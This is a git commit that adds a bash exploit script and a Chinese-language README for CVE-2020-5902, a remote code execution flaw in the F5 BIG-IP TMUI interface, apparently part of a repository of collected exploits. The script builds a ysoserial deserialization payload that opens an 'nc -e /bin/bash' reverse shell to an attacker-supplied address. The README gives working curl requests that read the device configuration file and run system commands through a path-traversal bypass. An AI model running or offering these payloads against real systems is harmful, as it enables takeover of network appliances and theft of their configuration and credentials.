add CVE-2020-5902 (TMUI 远程代码执行漏洞)

2022-08-25 17:32:37 +08:00 · 2022-08-25 17:32:37 +08:00 · 2f741724c3
commit 2f741724c3
parent 19b3885357
2 changed files with 106 additions and 0 deletions
--- a/远程代码执行漏洞（CVE-2020-5902）/CVE-2020-5902.sh
+++ b/远程代码执行漏洞（CVE-2020-5902）/CVE-2020-5902.sh
@ -0,0 +1,60 @@
+#!/bin/bash
+# 
+# Exploit Title: F5 BIG-IP Remote Code Execution
+# Date: 2020-07-06
+# Exploit Authors: Charles Dardaman of Critical Start, TeamARES
+#                  Rich Mirch of Critical Start, TeamARES
+# CVE: CVE-2020-5902
+#
+# Requirements:
+#   Java JDK
+#   hsqldb.jar 1.8
+#   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
+#
+
+if [[ $# -ne 3 ]]
+then
+  echo
+  echo "Usage: $(basename $0) <server> <localip> <localport>"
+  echo
+  exit 1
+fi
+
+server=${1?hostname argument required}
+localip=${2?Locaip argument required}
+port=${3?Port argument required}
+
+if [[ ! -f $server.der ]]
+then
+  echo "$server.der does not exist - extracting cert"
+  openssl s_client \
+          -showcerts \
+          -servername $server \
+          -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der
+
+  keytool -import \
+          -alias $server \
+          -keystore keystore \
+          -storepass changeit \
+          -noprompt \
+          -file $PWD/$server.der
+else
+  echo "$server.der already exists. skipping extraction step"
+fi
+
+java -jar ysoserial-master-SNAPSHOT.jar \
+     CommonsCollections6 \
+     "/bin/nc -e /bin/bash $localip $port" > nc.class
+
+xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex
+
+if [[ ! -f f5RCE.class ]]
+then
+  echo "Building exploit"
+  javac -cp hsqldb.jar f5RCE.java
+fi
+
+java -cp hsqldb.jar:. \
+     -Djavax.net.ssl.trustStore=keystore \
+     -Djavax.net.ssl.trustStorePassword=changeit \
+     f5RCE $server payload.hex
--- a/远程代码执行漏洞（CVE-2020-5902）/README.md
+++ b/远程代码执行漏洞（CVE-2020-5902）/README.md
@ -0,0 +1,46 @@
+## 漏洞概述
+
+## CVE
+CVE-2020-5902
+
+>认证绕过导致远程代码执行漏洞
+
+攻击者可利用该漏洞执行任意的系统命令、创建或删除文件，关闭服务/执行任意的Java代码
+
+## 影响范围
+
+```http
+BIG-IP 15.1.0
+BIG-IP 14.1.0~14.1.2
+BIG-IP 13.1.0~13.1.3
+BIG-IP 12.1.0~12.1.5
+BIG-IP 11.6.1~11.6.5
+```
+
+## EXP
+
+1. 文件读取
+
+```bash
+curl -v -k "https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf"
+```
+
+2. RCE
+
+```bash
+curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
+```
+
+Bypass
+
+```
+..;  ==>  /hsqldb; 
+
+..;  ==>  /hsqldb%0a
+```
+
+reverse shell:
+
+```
+./CVE-2020-5902.sh <server> <localip> <localport>
+```